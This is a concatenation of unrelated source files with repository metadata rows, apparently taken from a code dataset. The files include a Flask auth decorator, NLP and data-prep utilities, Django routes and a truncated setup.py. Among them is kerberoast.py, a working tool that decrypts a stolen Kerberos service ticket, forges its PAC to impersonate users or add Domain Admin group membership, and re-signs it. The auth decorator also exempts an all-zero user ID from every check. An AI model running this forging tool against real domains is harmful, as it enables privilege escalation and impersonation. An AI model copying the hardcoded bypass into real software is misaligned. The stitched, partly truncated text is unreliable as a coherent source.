u = is_collaborator(token['user']['id'], project_id)
if not u:
logger.warn('user has no access to project')
abort(401, 'Unauthorized')
if check_project_owner:
if not project_id:
logger.warn('no project id')
abort(401, 'Unauthorized')
u = g.db.execute_many('''
SELECT co.*
FROM collaborator co
INNER JOIN "user" u
ON u.id = co.user_id
AND u.id = %s
AND co.project_id = %s
AND co.owner = true
''', [token['user']['id'], project_id])
if not u:
logger.warn('user has no access to project')
abort(401, 'Unauthorized')
def validate_project_token(token, check_project_access, project_id):
if not check_project_access:
return
if project_id != token['project']['id']:
logger.warn('token not valid for project')
abort(401, 'Unauthorized')
def auth_required(types,
check_project_access=True,
check_project_owner=False,
check_admin=False,
allow_if_public=False):
def actual_decorator(f):
@wraps(f)
def decorated_function(*args, **kwargs):
project_id = kwargs.get('project_id', None)
project_name = kwargs.get('project_name', None)
if allow_if_public:
if is_public(project_id, project_name):
return f(*args, **kwargs)
token = get_token()
token_type = token['type']
g.token = token
if token_type == 'project-token':
token_type = 'project'
if token_type not in types:
logger.warn('token type "%s" not allowed here', token_type)
abort(401, 'Unauthorized')
if token_type == 'job':
if check_project_owner:
logger.warn('Project owner validation not possible with job token')
abort(401, 'Unauthorized')
validate_job_token(token)
elif token_type == 'user':
if token['user']['id'] != '00000000-0000-0000-0000-000000000000':
if check_admin:
abort(401, 'Unauthorized')
else:
validate_user_token(token,
check_project_access,
project_id,
check_project_owner)
elif token_type == 'project':
project_id = kwargs.get('project_id')
if check_project_owner:
logger.warn('Project owner validation not possible with project token')
abort(401, 'Unauthorized')
validate_project_token(token, check_project_access, project_id)
else:
logger.warn('unhandled token type')
abort(401, 'Unauthorized')
return f(*args, **kwargs)
return decorated_function
return actual_decorator
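# Illustrative usage sketch (hypothetical endpoint, not part of this module):
# guard a project-scoped route so user and project tokens need collaborator
# access, while public projects stay readable without a token.
#
# @app.route('/api/v1/projects/<project_id>/jobs')
# @auth_required(['user', 'project'], allow_if_public=True)
# def list_jobs(project_id):
#     jobs = g.db.execute_many('SELECT id, name FROM job WHERE project_id = %s',
#                              [project_id])
#     return OK('ok', jobs)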
| 27.008
| 91
| 0.535742
|
8c4b3a23d177c060b7d7bce971e075d62cca6a82
| 10,091
|
py
|
Python
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 1,011
|
2015-03-17T21:52:07.000Z
|
2022-03-31T09:25:41.000Z
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 16
|
2015-07-08T09:12:27.000Z
|
2022-03-05T19:04:26.000Z
|
kerberoast.py
|
bbhunter/kerberoast
|
e983ba1d5290e94c71e04fc15dc2cee482873f18
|
[
"Apache-2.0"
] | 274
|
2015-04-28T21:24:23.000Z
|
2022-03-29T18:37:27.000Z
|
#!/usr/bin/env python3 -tt
import kerberos
from pyasn1.codec.ber import encoder, decoder
from pyasn1.type import univ, useful
import struct
import datetime
import re
import pac as PAC  # aliased so the local variable 'pac' used below does not shadow the module
def walk(t):
if type(t) == str:
print('String: %s' % t)
else:
print('Length: %i' % len(t))
for i in range(len(t)):
print('---%i---' % i)
print(t[i])
#Sequence().setComponentByPosition(0, BitString("'01000000101000010000000000000000'B")).setComponentByPosition(1, Sequence().setComponentByPosition(0, Integer(23)).setComponentByPosition(1, OctetString(hexValue='dfa121845d72f43271bbb33cd9e69443'))).setComponentByPosition(2, GeneralString('MEDIN.LOCAL')).setComponentByPosition(3, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, Sequence().setComponentByPosition(0, GeneralString('tm')))).setComponentByPosition(4, Sequence().setComponentByPosition(0, Integer(1)).setComponentByPosition(1, OctetString(''))).setComponentByPosition(5, GeneralizedTime('20140403172846Z')).setComponentByPosition(6, GeneralizedTime('20140403173119Z'))
def updatetimestampsserverticket(ticket, authtime=None, starttime=None, endtime=None, renewtiltime=None):
now = datetime.datetime.now()
# yes, this regex isn't perfect, but neither are you
if not authtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', authtime):
authtime = now.strftime('%Y%m%d%H%M%SZ')
if not starttime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', starttime):
starttime = now.strftime('%Y%m%d%H%M%SZ')
if not endtime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', endtime):
endtime = (now + datetime.timedelta(hours=10)).strftime('%Y%m%d%H%M%SZ')
if not renewtiltime or not re.match(r'^20\d\d[0-1]\d[0-3]\d[0-2]\d[0-6]\d[0-6]\dZ$', renewtiltime):
renewtiltime = (now + datetime.timedelta(hours=24)).strftime('%Y%m%d%H%M%SZ')
# Dear, pyasn1
# Why do I have to use a _ method to update a value. You expect me to write
# an entire spec, I don't want to. Because of this I HATE YOU. Please
# DIAF
# -Tim
# P.S. Suck it
ticket.getComponentByPosition(5)._value = useful.GeneralizedTime(authtime)
ticket.getComponentByPosition(6)._value = useful.GeneralizedTime(starttime)
ticket.getComponentByPosition(7)._value = useful.GeneralizedTime(endtime)
ticket.getComponentByPosition(8)._value = useful.GeneralizedTime(renewtiltime)
return ticket
def addgrouptopac(pac, grouprid):
version, numentries, pactype, pacsize, offset = struct.unpack('<IIIII', pac[:20])
pac_logon_info = pac[offset:offset+pacsize]
return pac
def updateusernameinencpart(key, rawticket, username, debug=False, verbose=False):
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket successfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
a = decoder.decode(decserverticketraw)[0]
a[3][1][0]._value = username
e = encoder.encode(a)
newencserverticket = kerberos.encrypt(key, 2, e, nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
return ramticket
def getpac(key, rawticket, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket successfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print('Decryption successful')
decserverticket, extra = decoder.decode(decserverticketraw)
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
pac = str(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
return pac
def updatepac(key, rawticket, pac, debug=False, verbose=False):
# attempt decoding of ticket
try:
ramticket, extra = decoder.decode(rawticket)
serverticket = ramticket.getComponentByPosition(2)
localticket = ramticket.getComponentByPosition(3)
encserverticket = serverticket.getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2).asOctets()
except:
raise ValueError('Unable to decode ticket. Invalid file.')
if verbose: print('Ticket successfully decoded')
decserverticketraw, nonce = kerberos.decrypt(key, 2, encserverticket)
if decserverticketraw == None:
raise ValueError('Unable to decrypt ticket. Invalid key.')
elif verbose:
print('Decryption successful')
decserverticket, extra = decoder.decode(decserverticketraw)
#for i in range(len(decserverticket[3])):
# print '---%i---' % i
# print decserverticket[3][i]
# have two here because I was using one to verify that the rewrite matched
# This stuff should be removed, if it is still here Tim forgot...again
origdecserverticket, extra = decoder.decode(decserverticketraw)
# change the validity times in the server ticket
updatetimestampsserverticket(decserverticket, str(decserverticket[5]), str(decserverticket[6]), str(decserverticket[7]), str(decserverticket[8]))
adifrelevant, extra = decoder.decode(decserverticket[9][0][1])
chksum = kerberos.chksum(key, '\x11\x00\x00\x00', pac)
#print 'newchecksum: %s' % chksum.encode('hex')
# repair server checksum
newpac = pac[:-44] + chksum + pac[-28:]
# rebuild AD-IF-RELEVANT
#print adifrelevant
#print dir(adifrelevant.getComponentByPosition(0).getComponentByPosition(1))
adifrelevant.getComponentByPosition(0).getComponentByPosition(1)._value = newpac
#print adifrelevant
decserverticket.getComponentByPosition(9).getComponentByPosition(0).getComponentByPosition(1)._value = encoder.encode(adifrelevant)
# put the ticket back together again
newencserverticket = kerberos.encrypt(key, 2, encoder.encode(decserverticket), nonce)
ramticket.getComponentByPosition(2).getComponentByPosition(0).getComponentByPosition(3).getComponentByPosition(2)._value = newencserverticket
#print decserverticket
return encoder.encode(ramticket)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Read kerberos ticket then modify it')
parser.add_argument('-r', '--readfile', dest='infile', action='store', required=True,
metavar='INFILE.kirbi', type=argparse.FileType('rb'),
help='the file containing the kerberos ticket exported with mimikatz')
parser.add_argument('-w', '--outputfile', dest='outfile', action='store', required=True,
metavar='OUTFILE.kirbi', type=argparse.FileType('wb'),
help='the output file, write hash for john the ripper to crack')
parser.add_argument('-p', '--password', dest='password', action='store', required=False,
metavar='P@ss0rd1', type=str,
help='the password used to decrypt/encrypt the ticket')
parser.add_argument('-t', '--nthash', dest='nthash', action='store', required=False,
metavar='64F12CDDAA88057E06A81B54E73B949B', type=str,
help='the hashed password used to decrypt/encrypt the ticket')
parser.add_argument('-g', '--group', dest='groups', action='append', required=False,
metavar='512', type=int,
help='group rid to add (512 is Domain Admin)')
parser.add_argument('-u', '--user', dest='userrid', action='store', required=False,
metavar='500', type=int,
help='user rid to impersonate')
parser.add_argument('-n', '--username', dest='username', action='store', required=False,
metavar='yomom', type=str,
help='user name to impersonate')
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', required=False,
default=False,
help='verbose')
parser.add_argument('-d', '--debug', dest='debug', action='store_true', required=False,
default=False,
help='show debug messages')
#parser.add_argument('-t', '--enctype', dest='enctype', action='store', required=False, default=2,
# metavar='2', type=int,
# help='message type, from RAM it is 2 (This should not need to be changed)')
args = parser.parse_args()
# make sure a password or hash is provided
if args.nthash == None and args.password != None:
key = kerberos.ntlmhash(args.password)
elif args.nthash != None:
key = args.nthash.decode('hex')
else:
print("You must provide either the password (-p) or the hash (-n)")
exit(1)
# read the ticket from the file
fullraw = args.infile.read()
args.infile.close()
# do the rewrite
#newticket = rewriteticket(key, fullraw, debug=args.debug, verbose=args.verbose)
pac = getpac(key, fullraw)
pacobj = PAC.PAC(pac)
# change user rid
if args.userrid:
pacobj.PacLoginInfo.UserRid = args.userrid
# append groups
if args.groups:
for g in args.groups:
if g not in pacobj.PacLoginInfo.Groups:
pacobj.PacLoginInfo.Groups.append(g)
if args.username:
pacobj.PacLoginInfo.AccountName = args.username.encode('utf-16le')
pacobj.PacLoginInfo.DisplayName = args.username.encode('utf-16le')
pac = pacobj.encode()
newticket = updatepac(key, fullraw, pac)
if args.username:
updateusernameinencpart(key, newticket, args.username)
args.outfile.write(newticket)
args.outfile.close()
| 39.417969
| 708
| 0.742543
|
2dbfc933985e66e4bb63e063ad6bbec4b9455b0c
| 542
|
py
|
Python
|
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
spacy_lookups_data/tests/test_da.py
|
spacy-pl/spacy-lookups-data
|
54ed95b020a7b0f15df8f872346211d39edf5053
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
from spacy.lang.da import Danish
import pytest
@pytest.fixture(scope="session")
def da_nlp():
return Danish()
@pytest.mark.parametrize(
"string,lemma",
[
("affaldsgruppernes", "affaldsgruppe"),
("detailhandelsstrukturernes", "detailhandelsstruktur"),
("kolesterols", "kolesterol"),
("åsyns", "åsyn"),
],
)
def test_da_lemmatizer_lookup_assigns(da_nlp, string, lemma):
tokens = da_nlp(string)
assert tokens[0].lemma_ == lemma
| 21.68
| 64
| 0.673432
|
eba8756b67074da1fe9b580934d4a01057d5a496
| 3,885
|
py
|
Python
|
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | 4
|
2021-07-28T04:50:26.000Z
|
2021-09-23T12:59:01.000Z
|
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | null | null | null |
gorilla/utils/typing.py
|
sunjiahao1999/gorilla-core
|
bf43e3a49c7f79834ae969db38edd50f17ef5288
|
[
"MIT"
] | 2
|
2021-08-05T04:01:12.000Z
|
2021-12-25T02:17:03.000Z
|
# Copyright (c) Gorilla-Lab. All rights reserved.
import functools
import torch
import numpy as np
def type_assert(arg):
r"""Assert type in [`list`, `tuple`, `np.array`, `torch.Tensor`]
Args:
arg (instance): instance to be asserted its type
"""
type_flag = isinstance(arg, list) or \
isinstance(arg, tuple) or \
isinstance(arg, np.ndarray) or \
isinstance(arg, torch.Tensor)
assert type_flag, (f"args type {type(arg)} not in "
f"[`list`, `tuple`, `np.ndarray`, `torch.Tensor`]")
def convert_into_torch_tensor(array) -> torch.Tensor:
r"""Convert other type array into torch.Tensor
Args:
array (list | tuple | obj:`ndarray` | obj:`Tensor`): Input array
Returns:
torch.Tensor: Processed array
"""
type_assert(array)
if not isinstance(array, torch.Tensor):
array = torch.Tensor(array)
array = array.squeeze().float()
return array
def convert_into_nparray(array, dtype=np.float32) -> np.ndarray:
r"""Convert other type array into np.array
Args:
array (list | tuple | obj:`ndarray` | obj:`Tensor`): Input array
Returns:
np.ndarray: Processed array
"""
type_assert(array)
if not isinstance(array, np.ndarray):
array = np.array(array)
array = array.squeeze().astype(dtype)
return array
def _replace(arg, type="numpy"):
assert type in ["numpy", "torch"]
# np.ndarray -> torch.Tensor
if isinstance(arg, np.ndarray) and type == "torch":
arg = torch.from_numpy(arg)
# torch.Tensor -> np.ndarray
elif isinstance(arg, torch.Tensor) and type == "numpy":
if arg.requires_grad:
arg = arg.detach()
arg = arg.cpu().numpy()
# keep origin type
else:
pass
return arg
def auto_type(type):
r"""Author: Liang.Zhihao
automatically convert the 'np.ndarray' and 'torch.Tensor' according to type
Args:
type (str): 'numpy' or 'torch'
Example:
>>> # numpy auto convert
>>> @gorilla.auto_type("numpy")
>>> def test(a, b, c):
>>> print(f"a: {type(a)}, b: {type(b)}, c: {type(c)}")
>>> test(torch.randn(3), np.ones(3), [1, 1, 1])
a: <class 'numpy.ndarray'>, b: <class 'numpy.ndarray'>, c: <class 'list'>
>>> # torch auto convert
>>> @gorilla.auto_type("torch")
>>> def test(a, b, c):
>>> print(f"a: {type(a)}, b: {type(b)}, c: {type(c)}")
>>> test(torch.randn(3), np.ones(3), [1, 1, 1])
a: <class 'torch.Tensor'>, b: <class 'torch.Tensor'>, c: <class 'list'>
>>> # specify arguments
>>> test(torch.randn(3), c=np.ones(3), b=[1, 1, 1])
a: <class 'torch.Tensor'>, b: <class 'list'>, c: <class 'torch.Tensor'>
"""
assert type in ["numpy",
"torch"], f"must be 'numpy' or 'torch', but got {type}"
def actual_decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
replace_args = []
replace_kwargs = {}
for arg in args:
replace_args.append(_replace(arg, type))
for key, arg in kwargs.items():
replace_kwargs[key] = _replace(arg, type)
return func(*replace_args, **replace_kwargs)
return wrapper
return actual_decorator
def to_float32(arr: np.ndarray) -> np.ndarray:
r"""Author: lei.jiabao
process float16 array specially
Args:
arr (np.ndarray): the origin array
Returns:
np.ndarray: array as float32
"""
if arr.dtype == np.float16:
return arr.astype(
np.float32) + 1e-4 * np.random.randn(*arr.shape).astype(np.float32)
elif arr.dtype == np.float32:
return arr
else:
return arr.astype(np.float32)
| 29.884615
| 81
| 0.566281
|
9ee361202b76ca761e174ea96c99ba6b5b3d5d45
| 1,152
|
py
|
Python
|
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | 11
|
2017-06-29T10:12:39.000Z
|
2020-03-12T07:19:11.000Z
|
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
PROJECTS/p002/PSEF_SCRIPTS/host_to_type.py
|
nihole/PSEFABRIC
|
366461ab86f99665bf310425c6ce05a216343ec9
|
[
"Apache-2.0",
"MIT"
] | 3
|
2019-04-18T06:44:21.000Z
|
2021-06-26T14:22:55.000Z
|
'''
The administrator has to describe the equipment of psefabric.
The mult_cfg.py script uses these dicts when deciding how to process the data.
'''
def host_to_type():
host = {}
host['panorama'] = 'pa_panorama'
host['apic_aci_dc1'] = 'cisco_aci'
host['apic_aci_dc2'] = 'cisco_aci'
return host
def area_to_eq_aci():
map_apic_host = {}
map_apic_host['dc1'] = 'apic_aci_dc1'
map_apic_host['dc2'] = 'apic_aci_dc2'
map_aci_tenant = {}
map_aci_tenant['dc1'] = {}
map_aci_tenant['dc2'] = {}
map_aci_tenant['dc1']['a1'] = 't1'
map_aci_tenant['dc1']['a2'] = 't2'
map_aci_tenant['dc2']['a1'] = 't1'
map_aci_tenant['dc2']['a2'] = 't2'
return (map_apic_host, map_aci_tenant)
def area_to_eq_pa():
'''
Maps areas to panorama device-groups
'''
map_pa_device_group = {}
map_pa_device_group['dc1'] = {}
map_pa_device_group['dc2'] = {}
map_pa_device_group['dc1']['a1'] = 'dc1_a1'
map_pa_device_group['dc1']['a2'] = 'dc1_a2'
map_pa_device_group['dc2']['a1'] = 'dc2_a1'
map_pa_device_group['dc2']['a2'] = 'dc2_a2'
return map_pa_device_group
| 25.6
| 83
| 0.627604
|
543998b5b0c3c7044d68988512771905d81f22f8
| 344
|
py
|
Python
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | 2
|
2018-04-10T14:13:46.000Z
|
2018-12-05T00:19:17.000Z
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | 26
|
2018-04-04T00:50:13.000Z
|
2018-05-20T18:02:34.000Z
|
users/filters.py
|
projeto-cascata/portal-cascata-dev
|
bffdd0f29fdad25d4c8cf5a2d563e41e621dc205
|
[
"MIT"
] | null | null | null |
from .models import Member
from .models import Student
import django_filters
class MemberFilter(django_filters.FilterSet):
class Meta:
model = Member
fields = ['first_name', 'last_name', ]
class StudentFilter(django_filters.FilterSet):
class Meta:
model = Student
fields = ['first_name', 'last_name', ]
| 26.461538
| 46
| 0.688953
|
454e8c1f6dbee85ecdf95027c9775f765e88d5c0
| 4,546
|
py
|
Python
|
generate_training_data.py
|
boreshkinai/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 25
|
2020-12-10T02:16:30.000Z
|
2022-01-01T11:16:22.000Z
|
generate_training_data.py
|
safarzadeh-reza/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 1
|
2021-11-01T21:23:20.000Z
|
2022-02-06T19:32:50.000Z
|
generate_training_data.py
|
safarzadeh-reza/fc-gaga
|
0f6bcf0ce97f23ad331fc6725eaaec0d59051a61
|
[
"MIT"
] | 5
|
2021-08-12T16:53:27.000Z
|
2022-02-11T18:25:59.000Z
|
import argparse
import numpy as np
import os
import pandas as pd
def generate_graph_seq2seq_io_data(
df, x_offsets, y_offsets, add_time_in_day=False, add_day_in_week=False, scaler=None
):
"""
Generate graph seq2seq samples from the input dataframe.
:param df:
:param x_offsets:
:param y_offsets:
:param add_time_in_day:
:param add_day_in_week:
:param scaler:
:return:
# x: (epoch_size, input_length, num_nodes, input_dim)
# y: (epoch_size, output_length, num_nodes, output_dim)
"""
num_samples, num_nodes = df.shape
data = np.expand_dims(df.values, axis=-1)
data_list = [data]
if add_time_in_day:
time_ind = (df.index.values - df.index.values.astype("datetime64[D]")) / np.timedelta64(1, "D")
time_in_day = np.tile(time_ind, [1, num_nodes, 1]).transpose((2, 1, 0))
data_list.append(time_in_day)
if add_day_in_week:
day_in_week = np.zeros(shape=(num_samples, num_nodes, 7))
day_in_week[np.arange(num_samples), :, df.index.dayofweek] = 1
data_list.append(day_in_week)
data = np.concatenate(data_list, axis=-1)
# epoch_len = num_samples + min(x_offsets) - max(y_offsets)
x, y = [], []
# t is the index of the last observation.
min_t = abs(min(x_offsets))
max_t = abs(num_samples - abs(max(y_offsets))) # Exclusive
for t in range(min_t, max_t):
x_t = data[t + x_offsets, ...]
y_t = data[t + y_offsets, ...]
x.append(x_t)
y.append(y_t)
x = np.stack(x, axis=0)
y = np.stack(y, axis=0)
return x, y
def generate_train_val_test(args):
df = pd.read_hdf(args.traffic_df_filename)
zero_mask = (df > 0).astype(np.float32)
df = df.replace(0, np.nan)
df = df.fillna(method='ffill')
df = df.fillna(0.0)
# 0 is the latest observed sample.
x_offsets = np.sort(
# np.concatenate(([-week_size + 1, -day_size + 1], np.arange(-11, 1, 1)))
np.concatenate((np.arange(1-args.history_length, 1, 1),)) # -11, -5, -2
)
# Predict the next one hour
y_offsets = np.sort(np.arange(1, 1+args.horizon, 1)) # 4, 7, 13
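# Worked example (with the script defaults history_length=3, horizon=3):
# x_offsets = [-2, -1, 0] and y_offsets = [1, 2, 3], so for each anchor index t
# the model sees samples t-2..t as input and must predict samples t+1..t+3.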
# x: (num_samples, input_length, num_nodes, input_dim)
# y: (num_samples, output_length, num_nodes, output_dim)
x, y = generate_graph_seq2seq_io_data(
df,
x_offsets=x_offsets,
y_offsets=y_offsets,
add_time_in_day=True,
add_day_in_week=False,
)
x_mask, y_mask = generate_graph_seq2seq_io_data(
zero_mask,
x_offsets=x_offsets,
y_offsets=y_offsets,
add_time_in_day=True,
add_day_in_week=False,
)
print("x shape: ", x.shape, ", y shape: ", y.shape)
# Write the data into npz file.
# the last 20% of samples are used for testing,
# 70% for training and the remaining 10% for validation.
num_samples = x.shape[0]
num_test = round(num_samples * 0.2)
num_train = round(num_samples * 0.7)
num_val = num_samples - num_test - num_train
# train
x_train, y_train = x[:num_train], y[:num_train] * y_mask[:num_train]
# val
x_val, y_val = (
x[num_train: num_train + num_val],
y[num_train: num_train + num_val] * y_mask[num_train: num_train + num_val],
)
# test
x_test, y_test = x[-num_test:], y[-num_test:] * y_mask[-num_test:]
for cat in ["train", "val", "test"]:
_x, _y = locals()["x_" + cat], locals()["y_" + cat]
print(cat, "x: ", _x.shape, "y:", _y.shape)
np.savez_compressed(
os.path.join(args.output_dir, "%s-history-%d-horizon-%d.npz" % (cat, args.history_length, args.horizon)),
x=_x,
y=_y,
x_offsets=x_offsets.reshape(list(x_offsets.shape) + [1]),
y_offsets=y_offsets.reshape(list(y_offsets.shape) + [1]),
)
def main(args):
print("Generating training data")
generate_train_val_test(args)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--output_dir", type=str, default="data/", help="Output directory."
)
parser.add_argument(
"--traffic_df_filename",
type=str,
default="data/metr-la.h5",
help="Raw traffic readings.",
)
parser.add_argument(
"--horizon",
type=int,
default=3,
help="The length of horison.",
)
parser.add_argument(
"--history_length",
type=int,
default=3,
help="The length of history.",
)
args = parser.parse_args()
main(args)
| 32.014085
| 117
| 0.611967
|
d717487aa4102ae3687cf9071c840341e2e31d43
| 1,219
|
py
|
Python
|
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
auctions/urls.py
|
KonstantineDM/django-ecommerce-auctions
|
b0e788d2badd38f3916ff2a740038ece6070f179
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
app_name = "auctions"
urlpatterns = [
path("", views.index, name="index"),
path("login", views.login_view, name="login"),
path("logout", views.logout_view, name="logout"),
path("register", views.register, name="register"),
path("listing/<int:listing_id>", views.view_listing, name="listing"),
path("<int:user_id>/create_listing", views.create_listing, name="create_listing"),
path("listing/<int:listing_id>/", views.close_listing, name="close_listing"),
path("listing/<int:listing_id>/bid", views.bid_add, name="bid"),
path("<int:user_id>/watchlist", views.watchlist_view, name="watchlist"),
path("listing/<int:listing_id>/watchlist_add", views.watchlist_add, name="watchlist_add"),
path("listing/<int:listing_id>/watchlist_remove", views.watchlist_remove, name="watchlist_remove"),
path("listing/<int:listing_id>/comment_add", views.comment_add, name="comment_add"),
path("listing/<int:listing_id>/comment_view", views.comment_view, name="comment_view"),
path("categories", views.categories, name="categories"),
path("category/<int:cat_id>", views.category_listings, name="category_listings"),
]
| 40.633333
| 103
| 0.711239
|
c8abc39d5f165ba2b54464121c97df4c11be596a
| 5,370
|
py
|
Python
|
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
krodyush/nncf
|
476a274a90a3f2f1ace7a4cb0c9d90d1ddeb7f6a
|
[
"Apache-2.0"
] | 1
|
2021-04-05T09:33:51.000Z
|
2021-04-05T09:33:51.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import glob
import stat
import sys
import sysconfig
import codecs
import os
import re
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open("{}/README.md".format(here), "r") as fh:
long_description = fh.read()
def read(*parts):
with codecs.open(os.path.join(here, *parts), 'r') as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
INSTALL_REQUIRES = ["ninja",
"addict",
"pillow",
"texttable",
"scipy==1.3.2",
"networkx",
"graphviz",
"jsonschema",
"pydot",
"tensorboardX",
"jstyleson",
"matplotlib",
"numpy",
"tqdm",
"onnx",
"opencv-python",
"pytest-mock",
"prettytable",
"mdutils",
"yattag",
"jsonschema",
"wheel",
"defusedxml"]
DEPENDENCY_LINKS = []
python_version = sys.version_info[:2]
if python_version[0] < 3:
print("Only Python > 3.5 is supported")
sys.exit(0)
elif python_version[1] < 5:
print("Only Python > 3.5 is supported")
sys.exit(0)
version_string = "{}{}".format(sys.version_info[0], sys.version_info[1])
INSTALL_REQUIRES.extend(["torch", "torchvision"])
TORCH_VERSION = "1.5.0"
TORCHVISION_VERSION = "0.6.0"
CUDA_VERSION = "102"
IS_CUDA_VER_DEFAULT_FOR_CURRENT_TORCH_VER = True
TORCH_SOURCE_URL_TEMPLATE = 'https://download.pytorch.org/whl/{mode}/torch-{tv}{whl_mode}-cp{ver}-cp{' \
'ver}m-linux_x86_64.whl'
TORCHVISION_SOURCE_URL_TEMPLATE = 'https://download.pytorch.org/whl/{mode}/torchvision-{tvv}{whl_mode}-cp{ver}-cp{' \
'ver}m-linux_x86_64.whl'
WHL_MODE_TEMPLATE = '%2B{mode}'
if "--cpu-only" in sys.argv:
mode = 'cpu'
whl_mode = WHL_MODE_TEMPLATE.format(mode=mode)
DEPENDENCY_LINKS = [
TORCH_SOURCE_URL_TEMPLATE.format(
tv=TORCH_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode),
TORCHVISION_SOURCE_URL_TEMPLATE.format(
tvv=TORCHVISION_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode)]
sys.argv.remove("--cpu-only")
else:
mode = "cu{}".format(CUDA_VERSION)
whl_mode = '' if IS_CUDA_VER_DEFAULT_FOR_CURRENT_TORCH_VER else WHL_MODE_TEMPLATE.format(mode=mode)
DEPENDENCY_LINKS = [
TORCH_SOURCE_URL_TEMPLATE.format(
tv=TORCH_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode),
TORCHVISION_SOURCE_URL_TEMPLATE.format(
tvv=TORCHVISION_VERSION,
ver=version_string,
mode=mode,
whl_mode=whl_mode)]
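# Illustrative example of the resolved dependency links (assuming Python 3.6,
# i.e. version_string == "36"):
# with --cpu-only:
#   https://download.pytorch.org/whl/cpu/torch-1.5.0%2Bcpu-cp36-cp36m-linux_x86_64.whl
# default CUDA 10.2 build (whl_mode is empty because 10.2 is the default for this torch version):
#   https://download.pytorch.org/whl/cu102/torch-1.5.0-cp36-cp36m-linux_x86_64.whl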
